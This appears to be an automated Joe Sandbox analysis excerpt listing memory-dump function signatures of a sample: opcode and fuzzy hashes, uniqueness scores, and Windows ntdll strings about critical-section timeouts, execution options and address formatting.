                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 83a4389d2074899d55a4c291f5f697978793c3d38e2d0d95c78f0987909633c2
                                                              • Instruction ID: 772f5d0d7190209279c737097af34761097c8567fd1b0f6bcafe545f436efa9f
                                                              • Opcode Fuzzy Hash: 83a4389d2074899d55a4c291f5f697978793c3d38e2d0d95c78f0987909633c2
                                                              • Instruction Fuzzy Hash: 5411E572A00715ABDB21EF69C9C4B9EFBB8FF88744F500454EB04A7244D730ED058B50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                              • Instruction ID: 1a0e978b4aa3986ea7e086a9a2e3b6e37f7d4b3d052ddc524084cf1edef19f9f
                                                              • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                              • Instruction Fuzzy Hash: FEE0DF32A00120BFDF2297999D05F9ABEACDB94FA0F150065FA01EB194E530DE40C690
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              • Opcode ID: 633c5689deacf99b8dc5173e2f7e23e864e5e9584a7172848b8f404d4d974bd8
                                                              • Instruction ID: 56b29406e9699f1c4448f30ab30839466c51e17d22428c1acaee7cbc2dcc707d
                                                              • Opcode Fuzzy Hash: 633c5689deacf99b8dc5173e2f7e23e864e5e9584a7172848b8f404d4d974bd8
                                                              • Instruction Fuzzy Hash: E790023560941C02D25071584414746402597D0301F55C021E0024664DC7558B5577A3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fdff4aab21d703ef09a1adc7bdcd0106ac5fa19aafdb82cf779c87cb59ad6539
                                                              • Instruction ID: 13b0d466baf9f124844056ea453b1789f620dd0088c1e19bc82d76a738db97d6
                                                              • Opcode Fuzzy Hash: fdff4aab21d703ef09a1adc7bdcd0106ac5fa19aafdb82cf779c87cb59ad6539
                                                              • Instruction Fuzzy Hash: 3390023520541C02D20471584804686402597D0301F55C021E6024665ED6658A917233
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 774abe6a14e4574e9b184b9e2568c69bbcf9dce188e4caecb568764a850c4f05
                                                              • Instruction ID: c54b87dff85f07beed3563cfcb55e34012a25fa8821dccd8a926689781d5dcdd
                                                              • Opcode Fuzzy Hash: 774abe6a14e4574e9b184b9e2568c69bbcf9dce188e4caecb568764a850c4f05
                                                              • Instruction Fuzzy Hash: 5F900229225414020245B558060450B4465A7D6351395C025F14165A0CC6218A655323
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c3927bc401d437c6ab1c8ddc6696ecff6a2fc62545e5581a8a6f43d014c6f354
                                                              • Instruction ID: 8be032e9b929a9129dc46eb75e8fcae64b69b3d469f2792bc2841b125c13bf27
                                                              • Opcode Fuzzy Hash: c3927bc401d437c6ab1c8ddc6696ecff6a2fc62545e5581a8a6f43d014c6f354
                                                              • Instruction Fuzzy Hash: 2D9002A5205554924600B2588404B0A852597E0201B55C026E1054570CC5258A519237
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d6dbd0fc5584f409c94f7225f39dba45af72dfbc807d51e5c3646b76cf75b484
                                                              • Instruction ID: e92d08cc121a88a1a73500febaa4565d1146fe9b8b95f528db6cbe5e74b2175a
                                                              • Opcode Fuzzy Hash: d6dbd0fc5584f409c94f7225f39dba45af72dfbc807d51e5c3646b76cf75b484
                                                              • Instruction Fuzzy Hash: 2C90022520945842D20075585408A06402597D0205F55D021E10645A5DC6358A51A233
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f9fd13e7f59d0e3896147efc2124b4cb4270196d2b776389c51946ba8478d7ce
                                                              • Instruction ID: afad14760e3898a9f421a59581f106d356599dccab92e5f5b75177fd2b18b63b
                                                              • Opcode Fuzzy Hash: f9fd13e7f59d0e3896147efc2124b4cb4270196d2b776389c51946ba8478d7ce
                                                              • Instruction Fuzzy Hash: 5E90023524541802D241715844046064029A7D0241F95C022E0424564EC6558B56AB63
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dbad6528cde065d7f95b79fa367908552f7b1d462d6b3f07f16111107fd3de5c
                                                              • Instruction ID: 42d27c82410e6a42092bafae1d49bb70eecadf7e38774b039bca0ff3c3ec1ed5
                                                              • Opcode Fuzzy Hash: dbad6528cde065d7f95b79fa367908552f7b1d462d6b3f07f16111107fd3de5c
                                                              • Instruction Fuzzy Hash: AC90023520541C42D20071584404B46402597E0301F55C026E0124664DC615CA517623
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5b0bb0acc2e71662fcf26e902c9578b6cedc25a07f4e3730881c95a651868011
                                                              • Instruction ID: 1d2b4b494ec14394cbd665a45f4e5d4b1cc6846d77ea34e67dbaa2224ea32a29
                                                              • Opcode Fuzzy Hash: 5b0bb0acc2e71662fcf26e902c9578b6cedc25a07f4e3730881c95a651868011
                                                              • Instruction Fuzzy Hash: 0D90023520541803D20071585508707402597D0201F55D421E0424568DD6568A516223
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 763c3cae76f910689797a1faaaa7a47eab43395c1f7fca401a761abdbae05faa
                                                              • Instruction ID: 57665e36d3e35c43c9dae6d264e457c52c466fdcd3d05d3004b2c87f72330786
                                                              • Opcode Fuzzy Hash: 763c3cae76f910689797a1faaaa7a47eab43395c1f7fca401a761abdbae05faa
                                                              • Instruction Fuzzy Hash: B190022560941802D24071585418706403597D0201F55D021E0024564DC6598B5567A3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c9ab123fc572678bab0a05120a8ebf242adc2b4fc83df47f9d0aed81e5b9a08e
                                                              • Instruction ID: abdf1ee623205da83ac80fad1522007b5aaea5c927c58e8b6d32bb4348bc8e49
                                                              • Opcode Fuzzy Hash: c9ab123fc572678bab0a05120a8ebf242adc2b4fc83df47f9d0aed81e5b9a08e
                                                              • Instruction Fuzzy Hash: 1090026521541442D20471584404706406597E1201F55C022E2154564CC5298E615227
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7bde6377986e73fb06dc28b29d13d919d081642261ff342592906e0623f14e04
                                                              • Instruction ID: 301555cdd3405cb76eb17224228d9a7a8be48c666a91d7ba96419aa06cef8dfc
                                                              • Opcode Fuzzy Hash: 7bde6377986e73fb06dc28b29d13d919d081642261ff342592906e0623f14e04
                                                              • Instruction Fuzzy Hash: ED90023520581802D20071584808747402597D0302F55C021E5164565EC665CA916633
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e0c04e715de7706ca616a87f9d60eaedacebaa9ab8a43935cad46330df6610cb
                                                              • Instruction ID: 8a3dca5864be92e5f4f7a2db2aa795c2fcee9a3f4f208686da70a23431a9c40f
                                                              • Opcode Fuzzy Hash: e0c04e715de7706ca616a87f9d60eaedacebaa9ab8a43935cad46330df6610cb
                                                              • Instruction Fuzzy Hash: B490022530541802D202715844146064029D7D1345F95C022E1424565DC6258B53A233
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f93b57f4db76a579495e51c0a29b98bb7f126ea2e2e3efa215598058ed07c297
                                                              • Instruction ID: b25300b61730eb209adb4d59d70432946cd52e2adc09253ddeaecc94767c2508
                                                              • Opcode Fuzzy Hash: f93b57f4db76a579495e51c0a29b98bb7f126ea2e2e3efa215598058ed07c297
                                                              • Instruction Fuzzy Hash: FE90026520581803D24075584804607402597D0302F55C021E2064565ECA298E516237
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: efeb7d3a0e1018d047ac8f5e6c35dcc8ba707dfa2bf30a030817e9cafca49e47
                                                              • Instruction ID: 5e20aa95d0b613650d52991e5ab003aff65655aa896c9706a3fb6c211ba1952b
                                                              • Opcode Fuzzy Hash: efeb7d3a0e1018d047ac8f5e6c35dcc8ba707dfa2bf30a030817e9cafca49e47
                                                              • Instruction Fuzzy Hash: 7890022520585842D24072584804B0F812597E1202F95C029E4156564CC9158A555723
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 96da54081910ee62204fdb2a70bf442477ed38dd6701d94ca701c3af23183f03
                                                              • Instruction ID: d9b59c428a563d2ac9d79674d33c75148784043e4c6c5e03255cbedde32d4276
                                                              • Opcode Fuzzy Hash: 96da54081910ee62204fdb2a70bf442477ed38dd6701d94ca701c3af23183f03
                                                              • Instruction Fuzzy Hash: AA90022524541C02D240715884147074026D7D0601F55C021E0024564DC6168B6567B3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1e70dd3f3fb48fb822bf88571bf5688dc7fe331f507cb5fb944eff1ea7e88f24
                                                              • Instruction ID: 54a95b908d77c32696ab2504641c12d8d9ddb1d2a3a465914f63b16e0ecbf7a2
                                                              • Opcode Fuzzy Hash: 1e70dd3f3fb48fb822bf88571bf5688dc7fe331f507cb5fb944eff1ea7e88f24
                                                              • Instruction Fuzzy Hash: 5290023560951802D20071584514706502597D0201F65C421E0424578DC7958B5166A3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 20f5b91a21c98f8ae67977d4e064c5c4a1d2ec28717f70ec50039df2742e41a9
                                                              • Instruction ID: a7b5d9d530897a6680a2a3606fa94ab31967271726e903259f8e461fc6f46407
                                                              • Opcode Fuzzy Hash: 20f5b91a21c98f8ae67977d4e064c5c4a1d2ec28717f70ec50039df2742e41a9
                                                              • Instruction Fuzzy Hash: 2690022524946502D250715C44046168025B7E0201F55C031E08145A4DC5558A556323
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction ID: c9426cade94435567d774b5577d00b28502e669af4bd71e45f51fa75c3710862
                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction Fuzzy Hash:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 686ab27a6d6ba4500b643cec76a3519bc6dfe5f37d762a9181776f24e87e4b47
                                                              • Instruction ID: ec5a115ac610b5f00e33b3828bf2515228e069156b1398aa8cb4e21ac30cd724
                                                              • Opcode Fuzzy Hash: 686ab27a6d6ba4500b643cec76a3519bc6dfe5f37d762a9181776f24e87e4b47
                                                              • Instruction Fuzzy Hash: 9751D4B6A00116BFDB11DBAC889497FFBB8BB08740B14826DE5A9D7646D374DE4087E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 017F4725
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017F46FC
                                                              • Execute=1, xrefs: 017F4713
                                                              • ExecuteOptions, xrefs: 017F46A0
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 017F4787
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 017F4655
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 017F4742
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$[$]:%u
                                                              • API String ID: 48624451-2819853543
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 017F031E
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017F02BD
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017F02E7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017F728C
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 017F72C1
                                                              • RTL: Resource at %p, xrefs: 017F72A3
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 017F7294
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%